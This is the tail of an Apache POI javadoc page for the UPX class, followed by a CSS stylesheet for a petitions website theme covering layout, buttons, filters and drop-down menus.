<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hwpf/model/UPX.html#toString()">toString</a></strong>()</code> </td>
</tr>
</table>
<ul class="blockList">
<li class="blockList"><a name="methods_inherited_from_class_java.lang.Object">
<!-- -->
</a>
<h3>Methods inherited from class java.lang.Object</h3>
<code>clone, finalize, getClass, hashCode, notify, notifyAll, wait, wait, wait</code></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<div class="details">
<ul class="blockList">
<li class="blockList">
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor_detail">
<!-- -->
</a>
<h3>Constructor Detail</h3>
<a name="UPX(byte[])">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>UPX</h4>
<pre>public UPX(byte[] upx)</pre>
</li>
</ul>
</li>
</ul>
<!-- ============ METHOD DETAIL ========== -->
<ul class="blockList">
<li class="blockList"><a name="method_detail">
<!-- -->
</a>
<h3>Method Detail</h3>
<a name="getUPX()">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>getUPX</h4>
<pre>public byte[] getUPX()</pre>
</li>
</ul>
<a name="size()">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>size</h4>
<pre>public int size()</pre>
</li>
</ul>
<a name="equals(java.lang.Object)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>equals</h4>
<pre>public boolean equals(java.lang.Object o)</pre>
<dl>
<dt><strong>Overrides:</strong></dt>
<dd><code>equals</code> in class <code>java.lang.Object</code></dd>
</dl>
</li>
</ul>
<a name="toString()">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>toString</h4>
<pre>public java.lang.String toString()</pre>
<dl>
<dt><strong>Overrides:</strong></dt>
<dd><code>toString</code> in class <code>java.lang.Object</code></dd>
</dl>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
</div>
<!-- ========= END OF CLASS DATA ========= -->
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="class-use/UPX.html">Use</a></li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../../org/apache/poi/hwpf/model/UnhandledDataStructure.html" title="class in org.apache.poi.hwpf.model"><span class="strong">Prev Class</span></a></li>
<li><a href="../../../../../org/apache/poi/hwpf/model/Xst.html" title="class in org.apache.poi.hwpf.model"><span class="strong">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?org/apache/poi/hwpf/model/UPX.html" target="_top">Frames</a></li>
<li><a href="UPX.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li><a href="#constructor_summary">Constr</a> | </li>
<li><a href="#method_summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor_detail">Constr</a> | </li>
<li><a href="#method_detail">Method</a></li>
</ul>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<p class="legalCopy"><small>
<i>Copyright 2014 The Apache Software Foundation or
its licensors, as applicable.</i>
</small></p>
</body>
</html>
|
profiles/petitions/themes/petitions44/css/style.css | UAReformers/Petitions-Deploy-Distributive | /***** Reset ******/
html {
line-height: normal; }
ul, ol, li, h1, h2, h3, h4, h5, p {
margin: 0;
padding: 0; }
.clear {
clear: both; }
/***** HTML ******/
a {
color: #336699;
text-decoration: none; }
a:hover {
color: #003365; }
h2.page-title {
color: #669900;
font-size: 1.667em;
font-weight: normal;
letter-spacing: 0.04em;
margin: 20px 0; }
h4 {
color: #737373;
text-transform: uppercase;
margin: 0;
padding: 0;
letter-spacing: 0.03em;
font-size: 1em; }
h3 {
font-weight: bold;
color: #333;
margin: 0 0 15px 0;
font-size: 1.167em; }
/***** Cutup List ******/
ul.cutuplist li {
font-size: 18px;
margin: 0 0 10px 25px; }
h1.cutuphead {
margin: 45px 0 0 20px; }
ul.cutuplist {
margin: 20px; }
.spacer-for-cutup {
height: 105px; }
ul.cutuplist li a {
color: #336699; }
/***** Extras ******/
:-moz-any-link:focus {
outline: none; }
.float-left {
float: left; }
.float-right {
float: right; }
/***** From WH.gov ******/
body {
font-family: Arial,Helvetica,sans-serif;
font-size: 75%;
color: #333333;
height: 100%;
margin: 0;
padding: 0;
background: none; }
#petition-page {
background: url(../img/wh_home_new_header.jpg) no-repeat scroll top center;
/* background:url(../img/bg-main-one.jpg) center top no-repeat; */
min-height: 1000px;
/* Revised from 100% on site */
margin: 0;
min-width: 976px;
padding: 0;
position: relative; }
.center-on-page {
width: 976px;
margin: 0 auto; }
p {
font-size: 1em;
line-height: 1.5; }
/****** Structure ******/
body.petition #page-inner {
position: relative; }
/*
#petition-outer {
top: 268px;
position: absolute;
width: 974px;
}
*/
#hdr-flag {
margin: 12px 0 0 8px; }
#petition-inner {
/* padding: 25px 15px 50px 15px; */
padding: 25px 15px 50px; }
#petition-inner .main-content {
width: 687px;
float: left; }
.page-user #petition-inner .main-content {
margin: -18px 0px 0px -15px; }
#how-why-content {
background: url(../img/bg-how-why-left-nav.png) no-repeat top left;
min-height: 500px; }
#how-why-content .main-content {
width: 620px;
float: left;
padding: 0 80px 20px 10px; }
#how-why-content #step-content {
padding: 0 0 20px 5px;
width: 720px; }
.section-how-why #petition-inner {
padding: 0; }
.section-how-why #petition-inner #main-content-wrapper {
width: 100%; }
.section-how-why .read-more, .section-how-why .summary {
display: none; }
.section-how-why .details {
display: block !important; }
#button-sign-this-petition-signin {
color: #669900;
font-size: 1.333em;
margin: 31px 0 0; }
#step-content a#button-create-a-petition {
margin-left: 45px; }
#how-why-content .step-content {
width: 620px;
float: left;
padding: 0 80px 20px 5px; }
#how-why-content .left-nav {
width: 198px;
float: left;
padding: 14px 0 0 10px; }
#petition-inner .right-rail {
width: 238px;
float: right;
z-index: -20; }
.page-user #petition-inner .right-rail {
margin-top: -3px !important; }
#petition-inner .right-rail p {
margin: 0 0 15px 0; }
#petition-inner .right-rail .block {
margin-bottom: 0px; }
#wh-footer {
background-image: url(../img/wh_home_footer.jpg);
background-position: 0px 0px;
position: relative; }
#petition-inner .right-rail .container {
width: 238px; }
#petition-inner .right-rail-fixed {
position: fixed;
float: right;
top: 0px;
z-index: 40; }
#petition-inner .right-rail-fixed-bottom {
position: absolute;
z-index: 40; }
#petition-inner .right-rail-relative {
position: relative; }
/****** Common Styles ******/
.block-border {
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
border-radius: 5px;
padding: 3px 0 3px 5px;
background: #FFF;
border: 1px solid #d2d2d2; }
.p-fuzzy-divide {
background: url(../img/bg-divide.png) repeat-x;
height: 15px; }
/****** Petition Header ******/
#petition-header {
background: url(../img/sprite-bg.png) top left no-repeat;
min-height: 164px;
width: 976px; }
#petition-header .col-1 {
width: 720px;
float: left;
padding: 20px 0 0 0; }
#petition-header .col-2 {
width: 219px;
float: right;
padding: 0 15px; }
#petition-header a {
color: #FFF; }
#petition-header span.view-my-link a {
font-size: 1em;
font-weight: bold;
text-decoration: none; }
#petition-header span.loginout a {
font-size: 12px;
font-family: Arial;
font-weight: bold;
text-decoration: none;
color: #ffffff; }
#petition-header .col-2 .link-wrapper {
width: 100%;
color: #ffffff;
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
border-radius: 5px;
padding: 5px 0 3px 0; }
#petition-header .col-2 .float-right {
float: right; }
#petition-header .col-2 .link-wrapper:hover {
/*background: #829c44;*/
color: #c0e07e; }
#petition-header span.view-my-link {
background: url(../img/sprite-circle-icons.png) no-repeat 102px -170px;
padding-right: 27px;
padding-bottom: 4px; }
#petition-header .col-2 .text {
margin: 22px 10px 5px 0;
color: #d6eaad;
font-size: 12px;
line-height: 1.2;
font-family: Arial;
font-weight: normal;
min-height: 58px; }
#petition-header a.intro {
background: url(../img/bg-hdr-text.png) no-repeat;
height: 88px;
margin: 0 0 0 25px;
text-indent: -9000px;
width: 558px;
display: block; }
#petition-header ul {
margin: 0;
padding: 0; }
#petition-header ul.links {
margin-top: 15px; }
#petition-header ul.links li {
list-style-type: none;
float: left; }
#petition-header ul.links li a {
display: block;
font-size: 14px;
padding: 13px 14px 11px;
background: url(../img/nav-pet-bkg.gif) repeat-x;
border-right: 1px #6c8c27 solid;
border-bottom: none;
text-shadow: #535353 0px 2px 0px;
font-weight: bold;
text-transform: uppercase; }
#petition-header ul#main-menu-links li.front a {
background: url(../img/nav-pet.gif) no-repeat;
text-indent: -9999px;
width: 20px; }
#petition-header ul.links li:last-child a {
border-right: none; }
#petition-header ul.links li a:hover,
#petition-header ul#main-menu-links li.first a:hover {
background-position: 0 -41px; }
#petition-header ul.links li a.active,
#petition-header ul#main-menu-links li.first a.active {
background-position: 0 -82px; }
#petition-header ul.secondary-links {
float: right;
padding: 4px 0; }
#petition-header ul.secondary-links li {
padding: 0; }
/* TO-DO: In an effort to meet required deadlines, we have used a manual
solution to proerply display a divider to the right of secondary links. A
permanent solution will need to be created in the future. */
/*
#petition-header ul.secondary-links li:first-child {
padding-right: 5px;
border-right: 1px #fff solid;
}
*/
#petition-header ul.secondary-links li.menu-5401 a {
padding-right: 5px;
margin-right: 5px;
border-right: 1px solid #FFFFFF; }
#petition-header ul.secondary-links li.menu-5396 a {
padding-right: 5px;
margin-right: 5px;
border-right: 1px solid #FFFFFF; }
/* END OF CUSTOM CODE */
#petition-header ul.secondary-links li a {
font-weight: bold; }
#petition-header .col-2 .share-link {
-moz-border-radius: 5px 5px 5px 5px;
width: 170px;
margin: 0 0 23px 0; }
#petition-header .share-link span.view-my-link {
background: url(../img/sprite-circle-icons.png) no-repeat 124px -170px;
padding-right: 27px;
padding-bottom: 4px; }
#wh-feedback-link {
font-family: Arial;
font-size: 12px;
font-weight: bold;
color: #ffffff; }
#petition-header span.view-my-link a:hover {
color: #facc26; }
/****** Petition Intro Page ******/
#petition-intro-outer {
/*background:url(../img/sprite-bg.png) 0 -227px no-repeat;*/
min-height: 745px;
top: 0px;
width: 976px; }
.homepage #petition-inner, .node #petition-inner {
padding: 0px; }
#petition-intro-inner {
/*padding: 20px 15px 35px;*/ }
.petition-intro-video-wrapper {
text-align: center;
margin-bottom: 40px;
margin-top: 5px; }
#petition-intro-inner .col-3 {
width: 300px;
padding: 20px 15px 15px;
float: left;
margin-right: 17px;
min-height: 136px;
position: relative;
line-height: 140%;
color: #565649;
font-size: 1em; }
#petition-intro-inner .col-2 {
width: 420px;
padding: 20px 15px 15px;
float: left;
margin-right: 17px;
min-height: 110px;
position: relative;
line-height: 140%;
color: #565649;
font-size: 1em; }
#petition-intro-inner #intro-user-accounts {
width: 210px; }
#petition-intro-inner .col-last {
margin-right: 0; }
#petition-intro-inner h2 {
font-family: Arial,sans-serif;
font-size: 16px;
letter-spacing: 0.1em;
margin-bottom: 13px;
text-transform: uppercase; }
#petition-intro-inner h2 a {
color: #565649; }
#petition-intro-inner h2 a:hover {
color: #8b8b86; }
#petition-intro-inner .col-3 img {
float: right; }
#petition-intro-inner a.more {
color: #333;
font-weight: bold;
text-decoration: none;
background: url(../img/bullet-green-arrow.png) no-repeat right;
padding: 3px 19px 2px 0;
position: absolute;
bottom: 10px; }
#petition-intro-inner a.more:hover {
text-decoration: underline; }
#petition-intro-inner .bottom-box p, #petition-intro-inner .bottom-box ol {
margin-bottom: 15px;
letter-spacing: 0.04em; }
#petition-intro-inner .bottom-box li {
list-style-position: inside; }
/****** Petition Step Pages ******/
/* Steps */
#steps-wrapper {
background: url(../img/sprite.gif) no-repeat 0 -133px;
height: 56px;
letter-spacing: 0.01em; }
#steps-wrapper a {
color: #333;
font-weight: bold;
font-size: 1em;
text-decoration: none; }
#steps-wrapper .step a {
height: 25px;
float: left; }
#steps-wrapper .step-expand a {
color: #FFF; }
#steps-wrapper .step-complete a {
color: #7a7a7a; }
.step-1-collapse a {
width: 63px;
display: block;
background: url(../img/sprite.gif) no-repeat -607px 1px;
height: 25px;
padding: 13px 0 0 17px; }
.step-2-collapse a,
.step-3-collapse a,
.step-4-collapse a {
width: 67px;
display: block;
background: url(../img/sprite.gif) no-repeat -607px 1px;
padding: 13px 0 0 12px; }
.step-1-expand a {
background: url(../img/sprite.gif) no-repeat 0 -210px;
width: 213px;
padding: 13px 0 0 12px; }
.step-2-expand a,
.step-3-expand a,
.step-4-expand a {
background: url(../img/sprite.gif) no-repeat 0 -257px;
width: 203px;
padding: 13px 0 0 30px;
margin-left: -20px; }
.step-4-expand a {
width: 275px;
background: url(../img/sprite.gif) no-repeat 0 -306px; }
.petition-instructions {
font-size: 1.083em;
font-weight: bold;
color: #575757;
padding: 10px 0;
margin-bottom: 10px; }
.either-or-msg {
/* background:url(../img/sprite.gif) no-repeat 216px -392px;*/ }
.alert-msg span.red {
color: #880000; }
.petition-instructions span.or {
width: 28px;
font-size: 0; }
.alert-msg {
color: #737373;
font-size: 1.333em; }
.petition-list {
margin-bottom: 10px; }
.petition-list .add-margin {
margin-right: 17px; }
.list-we-petition-msg {
color: #669900;
text-align: center;
text-transform: uppercase;
font-size: 1.2em;
background: url(../img/bg-we-petition.gif) no-repeat -55px 28px;
width: 390px;
margin: 0 auto;
padding: 5px 0 20px 0;
letter-spacing: 0.02em; }
.petition-list .entry .title,
.petition-detail .title,
.petition-response .title {
font-family: Georgia, serif;
font-size: 1.667em;
line-height: 1.2em; }
h1.title {
color: #333333; }
.petition-list .entry .title {
margin: 0;
word-wrap: break-word; }
.petition-list .col-2 {
width: 335px; }
.petition-list .entry {
margin: 0 0 15px 0;
/*float: left;*/ }
.petition-list .entry .title a {
background: #f6f6f6;
display: block;
color: #333;
padding: 16px;
border: 1px solid #dbdbdb;
border-top-right-radius: 5px;
-moz-border-radius-topright: 5px;
-webkit-border-radius-topright: 5px;
border-top-left-radius: 5px;
-moz-border-radius-topleft: 5px;
-webkit-border-radius-topleft: 5px;
width: auto; }
.petition-list .col-2 .entry .title a {
height: 120px; }
.petition-list .entry .title a:hover {
text-decoration: underline;
color: #000;
background: #FFF;
border: 1px solid #e6e6e6; }
.petition-list .petitions .entry .action-bar,
#create-petition-form-step-2 .entry .action-bar,
#my-petitions .petition-list .entry .action-bar,
.full-page-list .entry .action-bar {
background: #e1e1e1;
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#e1e1e1', endColorstr='#b7b7b7');
/* for IE */
background: -webkit-gradient(linear, left top, left bottom, from(#e1e1e1), to(#b7b7b7));
/* for webkit browsers */
background: -moz-linear-gradient(top, #e1e1e1, #b7b7b7);
/* for firefox 3.6+ */
border-top: 1px solid #FFF;
padding: 0 10px 0 16px;
border-bottom-right-radius: 5px;
-moz-border-radius-bottomright: 5px;
-webkit-border-radius-bottomright: 5px;
border-bottom-left-radius: 5px;
-moz-border-radius-bottomleft: 5px;
-webkit-border-radius-bottomleft: 5px;
text-shadow: 0 1px 0 #ffffff; }
.full-page-list .entry .action-bar, #create-petition-form-step-2 .petition-list .response-entry .action-bar {
filter: none; }
.petition-list .responses .response-entry .action-bar, #create-petition-form-step-2 .petition-list .response-entry .action-bar {
background: url(../img/bg-action-bar-grey.png) repeat-x;
border-top: 1px solid #FFF;
padding: 0 10px 0 16px;
border-bottom-right-radius: 5px;
-moz-border-radius-bottomright: 5px;
-webkit-border-radius-bottomright: 5px;
border-bottom-left-radius: 5px;
-moz-border-radius-bottomleft: 5px;
-webkit-border-radius-bottomleft: 5px;
text-shadow: 0 1px 0 #ffffff; }
petition-list .responses .col-2 .response-entry .action-bar, #create-petition-form-step-2 .petition-list .response-entry .action-bar {
background: url(../img/bg-petitions-action-bar.png) no-repeat 0 0;
text-indent: -9000px;
display: block;
height: 41px; }
.petition-list .responses .response-entry .action-bar, #create-petition-form-step-2 .petition-list .response-entry .action-bar {
background: url(../img/bg-petitions-action-bar.png) no-repeat 0 -100px;
text-indent: -9000px;
display: block; }
.petition-list .responses .col-2 .response-entry .action-bar:hover, #create-petition-form-step-2 .petition-list .response-entry .action-bar {
background: url(../img/bg-petitions-action-bar.png) no-repeat 0 -49px; }
.petition-list .responses .response-entry .action-bar:hover {
background: url(../img/bg-petitions-action-bar.png) no-repeat 0 -148px; }
.petition-list .response-entry .read-response a {
display: block;
background: url(../img/sprite-buttons.png) no-repeat -298px -5px;
height: 26px;
margin: 13px 0 0 0; }
.petition-list .entry .num-sig {
width: 150px;
float: left;
padding: 5px 0 0 0;
font-size: 1.167em; }
.petition-list .entry .num {
font-family: Arial, sans-serif;
font-size: 1.667em;
font-weight: bold;
letter-spacing: 0.05em; }
.petition-list .entry .find-out {
width: 140px;
float: right;
text-indent: -9000px; }
.petition-list .entry .find-out a {
background: url(../img/button-find-out-more.png) no-repeat 0 0;
width: 149px;
height: 37px;
display: block; }
.petition-list .entry .find-out a:hover {
background: url(../img/button-find-out-more.png) no-repeat 0 -50px; }
.petition-warning {
padding: 8px;
color: #FFF;
width: 230px;
text-align: center;
height: 14px;
background: #921b1b;
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#c03838', endColorstr='#921b1b');
/* for IE */
background: -webkit-gradient(linear, left top, left bottom, from(#c03838), to(#921b1b));
/* for webkit browsers */
background: -moz-linear-gradient(top, #c03838, #921b1b);
/* for firefox 3.6+ */
font-weight: bold;
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
border-radius: 5px; }
/* Petition Detail */
.petition-detail {
padding: 0px 0px 0px 15px; }
.petition-detail-margin-right {
padding-right: 15px; }
.petition-detail .petition-warning {
margin: 0 0 25px 0; }
.petition-detail .title {
margin: 5px 0 10px 0;
font-size: 2em;
word-wrap: break-word; }
.petition-detail p, .modal p, .main-content p {
margin: 0 0 15px 0;
font-size: 1.167em;
line-height: 160%;
word-wrap: break-word; }
.petition-list #petition-wrapper p.no-results, .petition-list .responses p.no-results {
text-align: center; }
.petition-detail .issues, .petition-detail .date {
color: #737373;
margin: 0 0 10px 0; }
.petition-detail .sig-num {
background: url(../img/sprite.gif) no-repeat 0 -365px;
height: 80px;
position: relative; }
.petition-detail .num-block {
background: url(../img/bg-num-count.gif) no-repeat;
height: 32px;
width: 113px;
padding: 4px 0 0 10px;
float: left;
font-size: 2em;
font-weight: bold;
letter-spacing: 0.07em; }
.petition-detail .num-block1 {
position: absolute;
left: 165px;
top: 22px; }
.petition-detail .num-block2 {
position: absolute;
left: 475px;
top: 22px; }
#total-on .num-block, #total-count .num-block {
background: url(../img/bg-num-count-long.gif) no-repeat;
width: 160px; }
#total-count .num-block {
float: none;
margin: 0 0 5px 0; }
#total-on {
margin-right: 0;
width: 325px;
float: right; }
.sig-num .col-2 h4 {
width: 150px;
padding-right: 15px;
margin: 0px;
display: table-cell;
vertical-align: middle;
height: 80px;
float: none;
line-height: 1.2em; }
#total-on h4 {
width: 135px; }
.sig-num .col-2 {
width: 300px;
float: left;
margin-right: 25px;
height: 80px; }
.sig-num #total-on h4 {
padding-top: 0px; }
.petition-detail-publish-options {
background: url(../img/sprite.gif) no-repeat 0 -485px;
height: 219px; }
.petition-detail-publish-options .col-2 {
float: left;
width: 285px;
padding: 24px 25px 0 0; }
.petition-detail-publish-options a.button {
display: block;
text-indent: -9000px; }
input#button-publish-my-petition {
width: 250px;
height: 33px;
background: url(../img/button-publish-my-petition.gif) no-repeat 0 0;
margin: 0 0 15px 0;
cursor: pointer; }
input#button-publish-my-petition:hover {
background: url(../img/button-publish-my-petition.gif) no-repeat 0 -33px; }
input#button-publish-my-petition:active {
background: url(../img/button-publish-my-petition.gif) no-repeat 0 -65px; }
a#button-save-this-petition-and-publish-later {
width: 275px;
height: 25px;
background: url(../img/button-save-my-petition-and-publish-later.gif) no-repeat 0 0;
margin: 0 0 5px 0;
cursor: pointer;
-webkit-appearance: none !important; }
a#button-save-this-petition-and-publish-later:hover {
background: url(../img/button-save-my-petition-and-publish-later.gif) no-repeat 0 -26px; }
a#button-save-this-petition-and-publish-later:active {
background: url(../img/button-save-my-petition-and-publish-later.gif) no-repeat 0 -51px; }
input#button-back-to-previous-step {
width: 140px;
height: 25px;
background: url(../img/button-edit-my-petition.gif) no-repeat 0 0;
margin: 0 0 5px 0;
cursor: pointer; }
input#button-back-to-previous-step:hover {
background: url(../img/button-edit-my-petition.gif) no-repeat 0 -26px; }
input#button-back-to-previous-step:active {
background: url(../img/button-edit-my-petition.gif) no-repeat 0 -51px; }
a.button-delete-my-petition {
width: 155px;
height: 25px;
background: url(../img/button-delete-my-petition.gif) no-repeat 0 0;
margin: 0 0 5px 0;
cursor: pointer;
-webkit-appearance: none !important; }
a.button-delete-my-petition:hover {
background: url(../img/button-delete-my-petition.gif) no-repeat 0 -26px; }
a.button-delete-my-petition:active {
background: url(../img/button-delete-my-petition.gif) no-repeat 0 -51px; }
a#button-create-a-petition {
width: 241px;
height: 33px;
background: url(../img/sprite-buttons.png) no-repeat 0 -251px;
margin: 10px 0 15px 0;
display: block;
text-indent: -9000px;
-webkit-appearance: none !important; }
a#button-create-a-petition:hover {
background: url(../img/sprite-buttons.png) no-repeat 0 -284px; }
a#button-create-a-petition:active {
background: url(../img/sprite-buttons.png) no-repeat 0 -317px; }
#button-back-to-top {
width: 241px;
height: 33px;
background: url(../img/sprite-buttons.png) no-repeat 0 -840px;
margin: 10px 0 15px 0;
display: block;
text-indent: -9000px; }
#button-back-to-top:hover {
background: url(../img/sprite-buttons.png) no-repeat 0 -872px; }
#button-back-to-top:active {
background: url(../img/sprite-buttons.png) no-repeat 0 -904px; }
.petition-detail-publish-options p {
font-size: 1em;
color: #575757;
margin: 0 0 10px 0;
line-height: normal; }
.show-more-petitions-bar,
.show-more-responses-bar {
background: url(../img/sprite.gif) no-repeat 0 -728px;
height: 23px;
text-align: center;
display: block;
margin: 0 0 0 -1px;
text-transform: uppercase;
color: #737373;
font-size: .9em;
font-weight: bold;
letter-spacing: 0.03em;
padding: 10px 0 0 7px;
cursor: pointer; }
a.show-more-petitions-bar,
a.show-more-responses-bar {
color: #737373; }
.show-more-responses-bar {
letter-spacing: 0.01em;
padding-left: 9px; }
a.show-more-petitions-bar:hover,
a.show-more-responses-bar:hover {
color: #000; }
.loading-more-petitions-bar {
background: url(../img/sprite.gif) no-repeat 0 -794px;
height: 23px;
text-align: center;
display: block;
margin: 0 0 0 -1px;
text-transform: uppercase;
color: #737373;
font-size: 1em;
font-weight: bold;
letter-spacing: 0.03em;
padding: 10px 0 0 7px; }
.petition-detail .learn-more-about {
text-align: right; }
.petition-detail-publish-options .option p {
margin: 0 0 2px 0; }
#no-publish-other-options {
padding-left: 15px;
width: 320px; }
.petition-detail-publish-options .option {
margin-bottom: 15px; }
.top-msg-bar {
background: url(../img/sprite.gif) no-repeat 0 -133px;
height: 40px;
letter-spacing: 0.01em;
padding: 13px 15px 0 15px;
font-weight: bold; }
.top-msg-bar a.arrow {
color: #FFF;
background: url(../img/arrow-white-right.png) no-repeat right;
padding: 0 11px 0 0;
margin: 0 0 0 9px; }
.top-msg-bar a.arrow:hover {
text-decoration: underline; }
.top-msg-bar-blue {
background: url(../img/bg-msg-bar-blue.gif) no-repeat;
color: #FFF; }
.top-msg-bar-blue span {
cursor: pointer; }
.top-msg-bar-red {
background: url(../img/bg-msg-bar-red.gif) no-repeat;
color: #FFF; }
.top-msg-bar-reported {
background: #8B0000;
color: #FFF;
height: auto;
padding: 13px 15px;
margin-bottom: 15px; }
.petition-filter, .response-filter {
background: url(../img/sprite.gif) no-repeat 0 -133px;
height: 55px;
letter-spacing: 0.01em;
padding: 0 0 0 15px;
font-weight: bold;
position: relative; }
.petition-filter-reported {
height: 38px; }
#petition-inner .petition-filter-individual li, #petition-inner .petition-filter-individual li a {
color: #535353; }
#petition-inner .petition-filter-individual li a:hover, #petition-inner .petition-filter-individual li .popup-title:hover {
color: #000; }
#petition-inner .petition-filter-individual ul.filter-list {
width: 190px;
background: url(../img/bg-fuz-line-bar.png) no-repeat 0;
padding-left: 20px; }
/* Issues Filter */
#issues-filter-drop {
width: 654px;
position: absolute;
z-index: 5;
left: 225px;
padding: 0px;
top: 25px; }
#issues-filter-top {
background: url(../img/bg-issues-filter-top.png) no-repeat top;
height: 24px; }
#issues-filter-mid {
padding: 0 0 0 11px;
background: url(../img/bg-issues-filter-mid.png) repeat-y top; }
#issues-filter-bottom {
background: url(../img/bg-issues-filter-btm.png) no-repeat bottom;
height: 24px; }
.drop-down .header, .modal .header {
background: url(../img/sprite.gif) no-repeat 0 -848px;
color: #FFF;
height: 57px; }
.response-filter #issues-filter-drop .header {
background: url(../img/sprite.gif) no-repeat 0 -1337px; }
.drop-down .header h2, .modal .header h2 {
font-size: 1.333em; }
#issues-filter-drop h2,
#thank-you-modal .header h2 {
width: 300px;
float: left; }
.drop-down .header, .modal .header {
padding: 11px 0 0 15px; }
.drop-down div.close-button,
.modal div.close-button {
width: 100px;
display: block;
float: right;
padding: 2px 15px 2px 0;
margin: 0;
color: #FFF;
float: right;
text-transform: uppercase;
letter-spacing: 0.02em;
font-size: 0.833em;
width: 56px;
font-weight: bold;
cursor: pointer; }
.drop-down .header div.close-button:hover {
color: #FFF; }
input#button-filter-petitions {
width: 177px;
height: 33px;
background: url(../img/sprite-buttons.png) no-repeat -321px -48px;
margin: 0 0 15px 0;
text-indent: -9000px; }
#petition-inner #issues-filter-drop .form-item {
margin-bottom: 15px; }
#issues-filter-drop
input#button-filter-petitions {
margin: 15px 0 0 220px;
clear: both;
font-size: 0;
display: block;
line-height: 0; }
#issues-filter-drop .header div.close-button,
#thank-you-modal .header div.close-button,
#sign-create-modal .header a.close-button {
margin: 3px 10px 0 0;
background: url(../img/sprite-circle-icons.png) 37px -102px no-repeat;
color: #FFF; }
#petition-inner .drop-down label {
display: inline;
color: #737373;
font-size: 1em; }
#form-item-issues-filter {
margin: 0 0 0 10px; }
#form-item-issues-filter .group {
width: 211px;
float: left; }
#form-item-issues-filter .form-item-checkbox {
margin: 0 0 2px 0; }
.drop-down .form-type-checkbox .num {
font-weight: normal; }
.form-item-petition-issues {
clear: both;
margin-top: 40px; }
#petition-inner #issues-filter-drop .form-item {
margin: 0px; }
#petition-inner #issues-filter-drop .form-type-checkbox {
margin: 0 0 8px 0; }
/* Search drop down */
#search-drop {
background: url(../img/bg-search-drop.png) no-repeat;
width: 588px;
height: 129px;
position: absolute;
z-index: 5;
left: 355px;
padding: 21px 0 0 11px;
top: 25px; }
#search-drop div.close-button, .modal a.close-button,
#share-this-petition #report-petition-overlay span.close-button,
.delete-petition-overlay a.close-button {
color: #737373;
margin: 2px 17px 0 0;
padding: 0 0 5px 0;
background: url(../img/sprite-circle-icons.png) no-repeat 37px -139px;
text-transform: uppercase;
text-shadow: none;
font-size: 0.833em;
cursor: pointer; }
#share-this-petition #report-petition-overlay span.close-button,
.delete-petition-overlay a.close-button {
padding: 4px 20px 2px 0;
margin: 12px 0 0 0; }
.delete-petition-overlay a.close-button {
float: right;
display: block;
height: auto;
width: 35px; }
#search-drop #search-go-button {
border: none;
cursor: pointer;
font-size: 0;
background: url(../img/button-go-search.gif) no-repeat;
height: 43px;
line-height: 0;
position: absolute;
text-indent: -9999px;
width: 61px;
left: 500px;
top: 45px; }
#search-drop input#edit-filter-search {
background: url(../img/sprite.gif) no-repeat 0 -936px;
height: 38px;
width: 440px;
padding: 10px 0 11px 15px;
border: none;
font-weight: bold;
font-size: 1.333em;
outline: none; }
#search-drop .form-item {
margin: 25px 0 0 20px; }
.petition-filter ul.select-view,
.response-filter ul.select-view {
width: 290px;
padding-top: 8px; }
.petition-filter ul li,
.response-filter ul li {
float: left;
list-style-type: none;
text-shadow: 0 1px 0 #dcdcdc; }
.petition-filter ul li h2,
.response-filter ul li h2 {
text-shadow: none; }
.petition-filter ul.select-view li a,
.response-filter ul.select-view li a,
.response-filter ul.select-view li div {
color: #535353;
display: block;
padding: 4px 8px 3px 8px;
margin-right: 7px;
text-align: center; }
.petition-filter ul.select-view li a:hover,
.response-filter ul.select-view li a:hover {
color: #000; }
.petition-filter ul.select-view li a:active,
.response-filter ul.select-view li a:active {
color: #333; }
.petition-filter ul.filter-list,
.response-filter ul.filter-list {
background: url(../img/bg-fuz-line-bar.png) no-repeat 60px 0;
float: right;
width: 270px;
display: block;
height: 37px;
margin: -7px 0 0 0; }
ul.filter-list li.filter-by-issue,
ul.filter-list li.search {
padding: 2px 25px 2px 0;
display: block;
margin: 10px 0 0 0;
cursor: pointer; }
ul.filter-list li.filter-by-issue {
background: url(../img/sprite-circle-icons.png) no-repeat 83px 0;
margin-right: 7px; }
.response-filter ul.filter-list li.filter-by-issue {
background: url(../img/sprite-circle-icons.png) no-repeat 83px -65px;
margin-right: 7px; }
ul.filter-list li.filter-by-issue .popup-title:hover {
background: url(../img/sprite-circle-icons.png) no-repeat 83px -30px;
color: #000; }
ul.filter-list li.filter-by-issue .popup-title {
display: inline-block;
width: 84px; }
